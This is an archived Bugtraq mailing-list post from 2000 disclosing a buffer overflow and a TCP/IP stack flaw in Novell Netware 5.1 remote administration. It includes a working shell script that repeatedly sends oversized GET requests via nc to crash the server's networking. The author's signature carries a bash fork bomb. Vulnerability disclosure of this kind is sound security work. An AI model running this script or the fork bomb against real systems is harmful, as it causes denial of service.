Bugtraq mailing list archives
Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...
From: lcamtuf () TPI PL (Michal Zalewski)
Date: Tue, 18 Apr 2000 14:29:27 +0200
Hi again. Another overflow and TCP/IP stack flaw. Affected: virtually any system running on the top of Netware system with http remote administration (including web caching solutions, BorderManager firewall and so on)... There's an buffer overflow in remote (http, usually on port 8008 or so) administration protocol for tcp-enabled Netware servers - it might be exploited by sending request like that: GET / AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb) Connection won't be dropped (that's Netware TCP/IP stack problem or _feature_), but you'll get an error message on console, sometimes with stack dump (yes, lovely: 41 41 41 41... ;) There are two problems with it: 1. Of course, overflow, allowing attacker to execute arbitraty code on server, 2. Problem with TCP/IP stack; there's no automatic clean-up in case of application crash. By connecting, sending evil request, disconnecting and connecting again for some time (usually few thousand times is enough), whole TCP/IP stack will be fscked up, causing death of TCP networking (first, server starts to refuse or immediately drops any connection, then stops responding network requests), and, eventually, whole server dies. There's simple script, which, left for some time, should kill Netware TCP/IP. Please change $SERVER and $PORT for testing purposes. -- kill_nwtcp.c -- #!/bin/sh SERVER=127.0.0.1 PORT=8008 WAIT=3 DUZOA=`perl -e '{print "A"x4093}'` MAX=30 while:; do ILE=0 while [ $ILE -lt $MAX ]; do ( ( echo "GET /" echo $DUZOA echo ) | nc $SERVER $PORT & sleep $WAIT kill -9 $! ) &>/dev/null & ILE=$[ILE+1] done sleep $WAIT done -- EOF -- For me, Novell sells pretty good IPX solutions for local networks, but it isn't the best idea to use it as firewall, as system architecture based on DOS isn't good for Real Networking :( _______________________________________________________ Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=
Current thread:
- Novell Netware 5.1 (server 5.00h, Dec 11, 1999)... Michal Zalewski (Apr 18)
- GNU/Linux Richard Stallman (Apr 19)
- Remote DoS attack in Real Networks Real Server Vulnerability Ussr Labs (Apr 20)
- Re: Novell Netware 5.1 (server 5.00h, Dec 11, 1999)... Roy Sigurd Karlsbakk (Apr 20)
- Cisco Security Advisory: Cisco IOS Software TELNET Option Handling Vulnerability Cisco Systems Product Security Incident Response Team (Apr 20)